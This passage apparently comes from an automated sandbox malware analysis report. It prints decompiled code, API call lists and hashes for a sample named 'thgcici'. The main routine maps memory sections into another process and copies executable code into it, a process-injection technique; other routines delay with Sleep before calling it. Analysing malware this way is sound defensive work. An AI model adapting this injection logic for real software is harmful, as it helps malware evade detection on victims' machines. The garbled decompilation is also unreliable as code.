                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: fb4e74caaccc1c4ceb1dfab7c5280715ca441d32855fb4a2f95dbb33302aedab
                                                • Instruction ID: 24bf3b641dcec1e8044d3b4c6b67768af5ca568568a0cd1df2bbcc1fae36a819
                                                • Opcode Fuzzy Hash: fb4e74caaccc1c4ceb1dfab7c5280715ca441d32855fb4a2f95dbb33302aedab
                                                • Instruction Fuzzy Hash: BD51F7B5900249BFEF209F95CC48FEBBFB8EF85B10F100159FA11BA2A5D6749944CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 397 401617-40162b call 401274 401 401630-401635 397->401 402 40162d 397->402 404 401956-40195e 401->404 405 40163b-40164c 401->405 402->401 404->401 410 401963-4019b3 call 401274 404->410 408 401652-40167b 405->408 409 401954 405->409 408->409 418 401681-401698 NtDuplicateObject 408->418 409->410 418->409 420 40169e-4016c2 NtCreateSection 418->420 421 4016c4-4016e5 NtMapViewOfSection 420->421 422 40171e-401744 NtCreateSection 420->422 421->422 424 4016e7-401703 NtMapViewOfSection 421->424 422->409 425 40174a-40174e 422->425 424->422 427 401705-40171b 424->427 425->409 428 401754-401775 NtMapViewOfSection 425->428 427->422 428->409 430 40177b-401797 NtMapViewOfSection 428->430 430->409 433 40179d call 4017a2 430->433
                                                C-Code - Quality: 58%
                                                			E00401617(void* __edx, void* __esi, void* __eflags) {
                                                				void* _t85;
                                                				intOrPtr _t88;
                                                				void* _t91;
                                                				intOrPtr _t92;
                                                				struct _GUID _t99;
                                                				struct _GUID _t101;
                                                				PVOID* _t103;
                                                				PVOID* _t105;
                                                				intOrPtr* _t109;
                                                				PVOID* _t122;
                                                				PVOID* _t124;
                                                				intOrPtr _t128;
                                                				void** _t131;
                                                				signed int _t138;
                                                				int _t139;
                                                				void* _t156;
                                                				signed int _t160;
                                                				signed int _t161;
                                                				signed int _t162;
                                                				signed int _t163;
                                                				signed int _t164;
                                                				void* _t165;
                                                				intOrPtr* _t166;
                                                				void* _t169;
                                                				intOrPtr _t179;
                                                				void* _t180;
                                                				void* _t181;
                                                				HANDLE* _t187;
                                                				HANDLE* _t189;
                                                				void* _t194;
                                                				intOrPtr* _t197;
                                                				void* _t200;
                                                				void* _t201;
                                                				intOrPtr* _t203;
                                                				void* _t207;
                                                				long _t222;
                                                
                                                				_pop(ss);
                                                				L00401274(_t85, __edx, __esi, __eflags);
                                                				_t128 =  *((intOrPtr*)(_t201 + 8));
                                                				 *((intOrPtr*)(_t201 - 0x34)) = 0;
                                                				if(gs != 0) {
                                                					 *((intOrPtr*)(_t201 - 0x34)) =  *((intOrPtr*)(_t201 - 0x34)) + 1;
                                                				}
                                                				while(1) {
                                                					_t88 =  *((intOrPtr*)(_t128 + 0x48))();
                                                					if(_t88 != 0) {
                                                						break;
                                                					}
                                                					 *((intOrPtr*)(_t128 + 0x1c))(0x3e8);
                                                				}
                                                				 *((intOrPtr*)(_t201 - 0x5c)) = _t88;
                                                				_t187 = _t201 - 0x60;
                                                				 *_t187 = 0;
                                                				 *((intOrPtr*)(_t128 + 0x4c))(_t88, _t187);
                                                				_t91 =  *_t187;
                                                				if(_t91 != 0) {
                                                					_t131 = _t201 - 0x30;
                                                					 *_t131 = _t91;
                                                					_t131[1] = 0;
                                                					_t187 = _t201 - 0x28;
                                                					 *((intOrPtr*)(_t128 + 0x10))(_t187, 0x18);
                                                					 *_t187 = 0x18;
                                                					_push(_t201 - 0x30);
                                                					_push(_t187);
                                                					_push(0x40);
                                                					_push(_t201 - 0x10);
                                                					if( *((intOrPtr*)(_t128 + 0x70))() == 0 && NtDuplicateObject( *(_t201 - 0x10), 0xffffffff, 0xffffffff, _t201 - 0xc, 0, 0, 2) == 0) {
                                                						 *((intOrPtr*)(_t201 - 8)) = 0;
                                                						_t99 = _t201 - 0x50;
                                                						 *((intOrPtr*)(_t99 + 4)) = 0;
                                                						 *_t99 = 0x5000;
                                                						_t189 = _t201 - 0x54;
                                                						if(NtCreateSection(_t189, 6, 0, _t99, 4, 0x8000000, 0) == 0) {
                                                							 *_t25 =  *(_t201 - 0x50);
                                                							_t122 = _t201 - 0x44;
                                                							 *_t122 = 0;
                                                							if(NtMapViewOfSection( *_t189, 0xffffffff, _t122, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                                                								_t124 = _t201 - 0x3c;
                                                								 *_t124 = 0;
                                                								if(NtMapViewOfSection( *_t189,  *(_t201 - 0xc), _t124, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                                                									_t200 =  *(_t201 - 0x44);
                                                									 *((intOrPtr*)(_t128 + 0x20))(0, _t200, 0x104);
                                                									 *((intOrPtr*)(_t200 + 0x208)) =  *((intOrPtr*)(_t201 + 0x14));
                                                									 *((intOrPtr*)(_t201 - 8)) =  *((intOrPtr*)(_t201 - 8)) + 1;
                                                								}
                                                							}
                                                						}
                                                						_t101 = _t201 - 0x50;
                                                						 *((intOrPtr*)(_t101 + 4)) = 0;
                                                						 *_t101 =  *((intOrPtr*)(_t201 + 0x10)) + 0x10000;
                                                						_t187 = _t201 - 0x58;
                                                						if(NtCreateSection(_t187, 0xe, 0, _t101, 0x40, 0x8000000, 0) == 0 &&  *((intOrPtr*)(_t201 - 8)) != 0) {
                                                							 *_t46 =  *(_t201 - 0x50);
                                                							_t103 = _t201 - 0x48;
                                                							 *_t103 = 0;
                                                							if(NtMapViewOfSection( *_t187, 0xffffffff, _t103, 0, 0, 0, _t201 - 0x38, 1, 0, 4) == 0) {
                                                								_t105 = _t201 - 0x40;
                                                								 *_t105 = 0;
                                                								_t222 = NtMapViewOfSection( *_t187,  *(_t201 - 0xc), _t105, 0, 0, 0, _t201 - 0x38, 1, 0, 0x20);
                                                								if(_t222 == 0) {
                                                									L16();
                                                									if(_t222 == 0 && _t222 != 0) {
                                                										asm("hlt");
                                                										_push(_t203);
                                                									}
                                                									_push(0x2ea6);
                                                									_t207 = _t203 + 4;
                                                									_t160 = 0x2260;
                                                									_t161 = _t160 << 5;
                                                									_t162 = _t161 + 0x2260;
                                                									asm("lodsb");
                                                									_t163 = _t162;
                                                									asm("loop 0xffffffc4");
                                                									_t164 = _t163 ^ 0xad610a21;
                                                									_t203 = _t207 - _t164;
                                                									_t194 =  *((intOrPtr*)(_t201 + 0xc)) +  *((intOrPtr*)( *((intOrPtr*)(_t201 + 0xc))));
                                                									_t138 =  *(_t194 + 6) & 0x0000ffff;
                                                									_push(_t194);
                                                									_t165 = _t194;
                                                									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                										_t166 = _t165 + 0xf8;
                                                										__eflags = _t166;
                                                									} else {
                                                										_t166 = _t165 + 0x108;
                                                									}
                                                									_push(_t138);
                                                									_t139 =  *(_t166 + 0x10);
                                                									if(_t139 != 0) {
                                                										memcpy( *((intOrPtr*)(_t166 + 0xc)) +  *(_t201 - 0x48),  *((intOrPtr*)(_t166 + 0x14)) +  *((intOrPtr*)(_t201 + 0xc)), _t139);
                                                										_t203 = _t203 + 0xc;
                                                									}
                                                									asm("loop 0xffffffe6");
                                                									_pop(_t187);
                                                									_t226 =  *((intOrPtr*)(_t201 - 0x34));
                                                									if( *((intOrPtr*)(_t201 - 0x34)) == 0) {
                                                										_push(_t187);
                                                										_t169 = _t187[0xd] -  *(_t201 - 0x40);
                                                										_t197 = _t187[0x28] +  *(_t201 - 0x48);
                                                										__eflags = _t197;
                                                										while(1) {
                                                											__eflags =  *_t197;
                                                											if( *_t197 == 0) {
                                                												break;
                                                											}
                                                											_t179 =  *_t197;
                                                											_t197 = _t197 + 8;
                                                											asm("lodsw");
                                                											__eflags = 0;
                                                											if(0 != 0) {
                                                												 *0x00000000 =  *0x00000000 - _t169;
                                                												__eflags =  *((intOrPtr*)( *(_t201 - 0x48) + 0 + _t179));
                                                											}
                                                											asm("loop 0xffffffe9");
                                                										}
                                                										_pop(_t187);
                                                										__eflags = 0;
                                                										_t109 = _t201 - 4;
                                                										 *_t109 = 0;
                                                										 *((intOrPtr*)(_t128 + 0x98))( *(_t201 - 0xc), 0, 0, 0, 0, 0, _t187[0xa] +  *(_t201 - 0x40),  *(_t201 - 0x3c), _t109, 0);
                                                									} else {
                                                										L49();
                                                										_pop(_t180);
                                                										_t181 = _t180 - 0x1892;
                                                										 *((intOrPtr*)(_t181 + 0x18c6)) = _t181 + 0x304c;
                                                										L004012E3(_t128, _t226);
                                                										0x33(_t181 + 0x304c, 0x1ad);
                                                										 *((intOrPtr*)(_t181 + 0x18eb)) = _t181 + 0x309c;
                                                										0x33();
                                                									}
                                                								}
                                                							}
                                                						}
                                                					}
                                                				}
                                                				_push(0x161d);
                                                				_t92 =  *_t203;
                                                				_push(0x392);
                                                				_t156 = 0xf1;
                                                				return L00401274(_t92, _t156, _t187, _t226);
                                                			}







































                                                0x00401617
                                                0x00401618
                                                0x0040161d
                                                0x00401622
                                                0x0040162b
                                                0x0040162d
                                                0x0040162d
                                                0x00401630
                                                0x00401630
                                                0x00401635
                                                0x00000000
                                                0x00000000
                                                0x0040195b
                                                0x0040195b
                                                0x0040163b
                                                0x0040163e
                                                0x00401641
                                                0x00401645
                                                0x00401648
                                                0x0040164c
                                                0x00401652
                                                0x00401655
                                                0x00401657
                                                0x0040165a
                                                0x00401660
                                                0x00401663
                                                0x00401671
                                                0x00401672
                                                0x00401673
                                                0x00401675
                                                0x0040167b
                                                0x0040169e
                                                0x004016a1
                                                0x004016a4
                                                0x004016a7
                                                0x004016ad
                                                0x004016c2
                                                0x004016c7
                                                0x004016ca
                                                0x004016cd
                                                0x004016e5
                                                0x004016e7
                                                0x004016ea
                                                0x00401703
                                                0x00401705
                                                0x0040170f
                                                0x00401715
                                                0x0040171b
                                                0x0040171b
                                                0x00401703
                                                0x004016e5
                                                0x0040171e
                                                0x0040172a
                                                0x0040172d
                                                0x0040172f
                                                0x00401744
                                                0x00401757
                                                0x0040175a
                                                0x0040175d
                                                0x00401775
                                                0x0040177b
                                                0x0040177e
                                                0x00401795
                                                0x00401797
                                                0x0040179d
                                                0x004017a2
                                                0x004017a6
                                                0x004017a7
                                                0x004017a7
                                                0x004017ce
                                                0x004017d6
                                                0x004017fd
                                                0x00401809
                                                0x00401813
                                                0x00401822
                                                0x0040182a
                                                0x0040182f
                                                0x00401838
                                                0x00401841
                                                0x0040184d
                                                0x0040184f
                                                0x00401853
                                                0x00401854
                                                0x0040185a
                                                0x00401864
                                                0x00401864
                                                0x0040185c
                                                0x0040185c
                                                0x0040185c
                                                0x0040186a
                                                0x0040186b
                                                0x00401870
                                                0x0040187e
                                                0x0040187e
                                                0x0040187e
                                                0x00401884
                                                0x00401886
                                                0x00401887
                                                0x0040188b
                                                0x004018f3
                                                0x004018f7
                                                0x00401902
                                                0x00401902
                                                0x00401905
                                                0x00401905
                                                0x00401908
                                                0x00000000
                                                0x00000000
                                                0x0040190a
                                                0x00401914
                                                0x00401919
                                                0x0040191b
                                                0x00401920
                                                0x0040192c
                                                0x0040192c
                                                0x0040192c
                                                0x0040192e
                                                0x0040192e
                                                0x00401932
                                                0x00401939
                                                0x0040193b
                                                0x0040193e
                                                0x0040194e
                                                0x0040188d
                                                0x0040188d
                                                0x00401892
                                                0x00401893
                                                0x004018a9
                                                0x004018b8
                                                0x004018c5
                                                0x004018dc
                                                0x004018ea
                                                0x004018ea
                                                0x0040188b
                                                0x00401797
                                                0x00401775
                                                0x00401744
                                                0x0040167b
                                                0x0040196b
                                                0x00401970
                                                0x00401984
                                                0x004019a2
                                                0x004019b3

                                                APIs
                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016FE
                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040173F
                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401770
                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401792
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$View$Create$DuplicateObject
                                                • String ID:
                                                • API String ID: 1546783058-0
                                                • Opcode ID: 25f5eb01983d9281b1127e50c890fc92aa8b6165b5d631ffe35390f1c87f28db
                                                • Instruction ID: 57dcf3cccefe6a0511f6925536cc6eed8aa77802ca08ef68a5075aa0b4e04b8e
                                                • Opcode Fuzzy Hash: 25f5eb01983d9281b1127e50c890fc92aa8b6165b5d631ffe35390f1c87f28db
                                                • Instruction Fuzzy Hash: 2851E8B5900249BBEF209F95CC48FEBBFB8EF85B10F100159FA11BA2A5D6709944CB24
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 436 4019b6-4019d9 440 4019e1-401a20 call 401274 Sleep call 4014db 436->440 441 4019ea 436->441 450 401a22-401a2a call 4015d5 440->450 451 401a2f-401a81 call 401274 440->451 441->440 450->451
                                                C-Code - Quality: 24%
                                                			E004019B6(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                				char _v3;
                                                				intOrPtr _v8;
                                                				intOrPtr* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				char* __ebp;
                                                
                                                				_push(0x1a03);
                                                				asm("les eax, [ebx+ebp*8]");
                                                				 *__eax =  *__eax + __al;
                                                				__edx = 0x3a;
                                                				__eax = L00401274(__eax, __edx, __esi, __eflags);
                                                				__ebx = _a4;
                                                				Sleep(0x1388);
                                                				_push(__ebx);
                                                				asm("sbb al, 0x8d");
                                                				__ebp =  &_v3;
                                                				asm("cld");
                                                				_push(__eax);
                                                				_push(_a12);
                                                				_push(_a8);
                                                				_push(__ebx); // executed
                                                				__eax = L004014DB(__ebx, __edi, __esi); // executed
                                                				__eflags = __eax;
                                                				if(__eflags != 0) {
                                                					__eax = E004015D5(__eflags, __ebx, __eax, _v8, _a16); // executed
                                                				}
                                                				__eax =  *__ebx(0xffffffff, 0);
                                                				_push(0x1a03);
                                                				__eax =  *__esp;
                                                				__esp = __esp + 4;
                                                				_push(0x7a);
                                                				__esp = __esp + 4;
                                                				__edx = 0x3a;
                                                				return __eax;
                                                			}









                                                0x004019c7
                                                0x004019d0
                                                0x004019e4
                                                0x004019f6
                                                0x004019fe
                                                0x00401a03
                                                0x00401a0b
                                                0x00401a0c
                                                0x00401a0d
                                                0x00401a0f
                                                0x00401a10
                                                0x00401a11
                                                0x00401a12
                                                0x00401a15
                                                0x00401a18
                                                0x00401a19
                                                0x00401a1e
                                                0x00401a20
                                                0x00401a2a
                                                0x00401a2a
                                                0x00401a33
                                                0x00401a3c
                                                0x00401a41
                                                0x00401a44
                                                0x00401a55
                                                0x00401a5a
                                                0x00401a6c
                                                0x00401a81

                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401A0B
                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                  • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 343382a63b9dc1a00de7b251b98f39ef397375da7f983e3c6d6c25cfe0f74acf
                                                • Instruction ID: eb9b8508e323ec0cad1531328720b9b31e587639ee963e529393297323997007
                                                • Opcode Fuzzy Hash: 343382a63b9dc1a00de7b251b98f39ef397375da7f983e3c6d6c25cfe0f74acf
                                                • Instruction Fuzzy Hash: 5E11ACB170D204FBDB00AA958C92EAA3668AB41350F208137F643790F0D57D9A13EB6F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 465 4019c1-4019d8 467 4019e1-401a20 call 401274 Sleep call 4014db 465->467 468 4019ea 465->468 477 401a22-401a2a call 4015d5 467->477 478 401a2f-401a81 call 401274 467->478 468->467 477->478
                                                C-Code - Quality: 37%
                                                			E004019C1(intOrPtr* __eax, void* __ebx, void* __edi, signed int __esi, void* __eflags) {
                                                				void* _t11;
                                                				void* _t12;
                                                				signed char _t14;
                                                				signed char _t17;
                                                				intOrPtr* _t19;
                                                				intOrPtr* _t21;
                                                				void* _t26;
                                                				void* _t27;
                                                				void* _t31;
                                                				void* _t32;
                                                				signed char* _t34;
                                                				intOrPtr* _t40;
                                                
                                                				_t29 = __esi;
                                                				_t27 = __edi;
                                                				_t11 = __ebx;
                                                				_t21 = __eax;
                                                				if(__eflags >= 0) {
                                                					 *(__ebx + 0x1a0368) =  *(__ebx + 0x1a0368) ^ __esi;
                                                					_push(0x1a03);
                                                					_t17 =  *_t34;
                                                					asm("les eax, [ebx+ebp*8]");
                                                					_t19 = (_t17 & 0x00000083) + 0xefebec34;
                                                					_t40 = _t19;
                                                					 *_t19 =  *_t19 + _t19;
                                                					_t26 = 0x3a;
                                                					_t11 = L00401274(_t19, _t26, __esi, _t40);
                                                					_t21 =  *((intOrPtr*)(_t31 + 8));
                                                					Sleep(0x1388);
                                                				}
                                                				_push(_t21);
                                                				asm("sbb al, 0x8d");
                                                				_t32 = _t31 + 1;
                                                				asm("cld");
                                                				_push(_t11);
                                                				_push( *((intOrPtr*)(_t32 + 0x10)));
                                                				_push( *((intOrPtr*)(_t32 + 0xc)));
                                                				_push(_t21); // executed
                                                				_t12 = L004014DB(_t21, _t27, _t29); // executed
                                                				_t41 = _t12;
                                                				if(_t12 != 0) {
                                                					E004015D5(_t41, _t21, _t12,  *((intOrPtr*)(_t32 - 4)),  *((intOrPtr*)(_t32 + 0x14))); // executed
                                                				}
                                                				 *_t21(0xffffffff, 0);
                                                				_push(0x1a03);
                                                				_t14 =  *_t34;
                                                				_push(0x7a);
                                                				return L00401274(_t14, 0x3a, _t29, _t41);
                                                			}















                                                0x004019c1
                                                0x004019c1
                                                0x004019c1
                                                0x004019c1
                                                0x004019c2
                                                0x004019c4
                                                0x004019c7
                                                0x004019cc
                                                0x004019d0
                                                0x004019d3
                                                0x004019d3
                                                0x004019e4
                                                0x004019f6
                                                0x004019fe
                                                0x00401a03
                                                0x00401a0b
                                                0x00401a0b
                                                0x00401a0c
                                                0x00401a0d
                                                0x00401a0f
                                                0x00401a10
                                                0x00401a11
                                                0x00401a12
                                                0x00401a15
                                                0x00401a18
                                                0x00401a19
                                                0x00401a1e
                                                0x00401a20
                                                0x00401a2a
                                                0x00401a2a
                                                0x00401a33
                                                0x00401a3c
                                                0x00401a41
                                                0x00401a55
                                                0x00401a81

                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401A0B
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 10279e3da5121546f0d91c1218fcc9a868dda0bee5ac91498bd985457264a302
                                                • Instruction ID: bc127a57cd23688ba61662e4244e13cd0ea45db4b64a25b4eed15f00afb0d5a5
                                                • Opcode Fuzzy Hash: 10279e3da5121546f0d91c1218fcc9a868dda0bee5ac91498bd985457264a302
                                                • Instruction Fuzzy Hash: 95118E7170D240EBDB019AA4CD92EAA3764AB45350F2081BBF547790F1C67D9613EF1B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 492 401a39 493 401a3c-401a81 call 401274 492->493 494 4019ce-401a20 call 401274 Sleep call 4014db 492->494 514 401a22-401a2a call 4015d5 494->514 515 401a2f-401a4b 494->515 514->515 515->493
                                                C-Code - Quality: 31%
                                                			E00401A39(signed int __eax, void* __edi, void* __esi) {
                                                				intOrPtr* _t9;
                                                				void* _t10;
                                                				void* _t11;
                                                				intOrPtr _t13;
                                                				intOrPtr* _t16;
                                                				void* _t20;
                                                				void* _t26;
                                                				void* _t27;
                                                				intOrPtr* _t29;
                                                				intOrPtr* _t33;
                                                
                                                				_t24 = __esi;
                                                				asm("les eax, [ebx+ebp*8]");
                                                				_t9 = (__eax & 0x00000083) + 0xefebec34;
                                                				_t33 = _t9;
                                                				 *_t9 =  *_t9 + _t9;
                                                				_t20 = 0x3a;
                                                				_t10 = L00401274(_t9, _t20, __esi, _t33);
                                                				_t16 =  *((intOrPtr*)(_t26 + 8));
                                                				Sleep(0x1388);
                                                				_push(_t16);
                                                				asm("sbb al, 0x8d");
                                                				_t27 = _t26 + 1;
                                                				asm("cld");
                                                				_push(_t10);
                                                				_push( *((intOrPtr*)(_t27 + 0x10)));
                                                				_push( *((intOrPtr*)(_t27 + 0xc)));
                                                				_push(_t16); // executed
                                                				_t11 = L004014DB(_t16, __edi, _t24); // executed
                                                				_t34 = _t11;
                                                				if(_t11 != 0) {
                                                					E004015D5(_t34, _t16, _t11,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
                                                				}
                                                				 *_t16(0xffffffff, 0);
                                                				_push(0x1a03);
                                                				_t13 =  *_t29;
                                                				_push(0x7a);
                                                				return L00401274(_t13, 0x3a, _t24, _t34);
                                                			}













                                                0x00401a39
                                                0x004019d0
                                                0x004019d3
                                                0x004019d3
                                                0x004019e4
                                                0x004019f6
                                                0x004019fe
                                                0x00401a03
                                                0x00401a0b
                                                0x00401a0c
                                                0x00401a0d
                                                0x00401a0f
                                                0x00401a10
                                                0x00401a11
                                                0x00401a12
                                                0x00401a15
                                                0x00401a18
                                                0x00401a19
                                                0x00401a1e
                                                0x00401a20
                                                0x00401a2a
                                                0x00401a2a
                                                0x00401a33
                                                0x00401a3c
                                                0x00401a41
                                                0x00401a55
                                                0x00401a81

                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401A0B
                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                  • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 328c7e616dc65b60337e749517f620b74e3a6904ffc48dfa277e7a67c85ebbd0
                                                • Instruction ID: 3e21701bb5f0e512797832e813f874bbfc20ecba1c70a9a875b4590e50435436
                                                • Opcode Fuzzy Hash: 328c7e616dc65b60337e749517f620b74e3a6904ffc48dfa277e7a67c85ebbd0
                                                • Instruction Fuzzy Hash: 1F016971709104EBDB00AA94CD92AAA3264AB45350F20817BF643B90F0D63D9A13EB1F
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 519 4019e8-401a20 call 401274 Sleep call 4014db 525 401a22-401a2a call 4015d5 519->525 526 401a2f-401a81 call 401274 519->526 525->526
                                                C-Code - Quality: 31%
                                                			E004019E8(intOrPtr* __eax, void* __edi, void* __esi, void* __eflags) {
                                                				void* _t8;
                                                				void* _t9;
                                                				intOrPtr _t11;
                                                				intOrPtr* _t14;
                                                				void* _t18;
                                                				void* _t24;
                                                				void* _t25;
                                                				void* _t26;
                                                				intOrPtr* _t28;
                                                
                                                				_t22 = __esi;
                                                				_t7 = __eax;
                                                				_t25 = _t24 - 1;
                                                				asm("invalid");
                                                				 *__eax =  *__eax + __eax;
                                                				_t18 = 0x3a;
                                                				_t8 = L00401274(_t7, _t18, __esi, __eflags);
                                                				_t14 =  *((intOrPtr*)(_t25 + 8));
                                                				Sleep(0x1388);
                                                				_push(_t14);
                                                				asm("sbb al, 0x8d");
                                                				_t26 = _t25 + 1;
                                                				asm("cld");
                                                				_push(_t8);
                                                				_push( *((intOrPtr*)(_t26 + 0x10)));
                                                				_push( *((intOrPtr*)(_t26 + 0xc)));
                                                				_push(_t14); // executed
                                                				_t9 = L004014DB(_t14, __edi, _t22); // executed
                                                				_t33 = _t9;
                                                				if(_t9 != 0) {
                                                					E004015D5(_t33, _t14, _t9,  *((intOrPtr*)(_t26 - 4)),  *((intOrPtr*)(_t26 + 0x14))); // executed
                                                				}
                                                				 *_t14(0xffffffff, 0);
                                                				_push(0x1a03);
                                                				_t11 =  *_t28;
                                                				_push(0x7a);
                                                				return L00401274(_t11, 0x3a, _t22, _t33);
                                                			}












                                                0x004019e8
                                                0x004019e8
                                                0x004019e8
                                                0x004019e9
                                                0x004019e4
                                                0x004019f6
                                                0x004019fe
                                                0x00401a03
                                                0x00401a0b
                                                0x00401a0c
                                                0x00401a0d
                                                0x00401a0f
                                                0x00401a10
                                                0x00401a11
                                                0x00401a12
                                                0x00401a15
                                                0x00401a18
                                                0x00401a19
                                                0x00401a1e
                                                0x00401a20
                                                0x00401a2a
                                                0x00401a2a
                                                0x00401a33
                                                0x00401a3c
                                                0x00401a41
                                                0x00401a55
                                                0x00401a81

                                                APIs
                                                • Sleep.KERNELBASE(00001388), ref: 00401A0B
                                                  • Part of subcall function 004015D5: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401690
                                                  • Part of subcall function 004015D5: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004016BD
                                                  • Part of subcall function 004015D5: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016E0
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.447095995.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_thgcici.jbxd
                                                Similarity
                                                • API ID: Section$CreateDuplicateObjectSleepView
                                                • String ID:
                                                • API String ID: 1885482327-0
                                                • Opcode ID: 48fa2cf4c2f539a98f446827c3e80ab619ac2f5f9041cc3ed543c0119245ada8
                                                • Instruction ID: 7b7b6cc2fe2900c275b7dd1747d7b1898519f5b928d3d531ab9a34503a4fca0f
                                                • Opcode Fuzzy Hash: 48fa2cf4c2f539a98f446827c3e80ab619ac2f5f9041cc3ed543c0119245ada8
                                                • Instruction Fuzzy Hash: BE018432709244EBDF00AA949C41EAA3764EB46350F20857BF603790F1D53D9712EF1B
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 540 4019fd-401a20 call 401274 Sleep call 4014db 546 401a22-401a2a call 4015d5 540->546 547 401a2f-401a81 call 401274 540->547 546->547
                                                C-Code - Quality: 28%
                                                			E004019FD(void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                				void* _t7;
                                                				void* _t8;
                                                				void* _t9;
                                                				void* _t10;
                                                				intOrPtr _t12;
                                                				intOrPtr* _t15;
                                                				void* _t24;
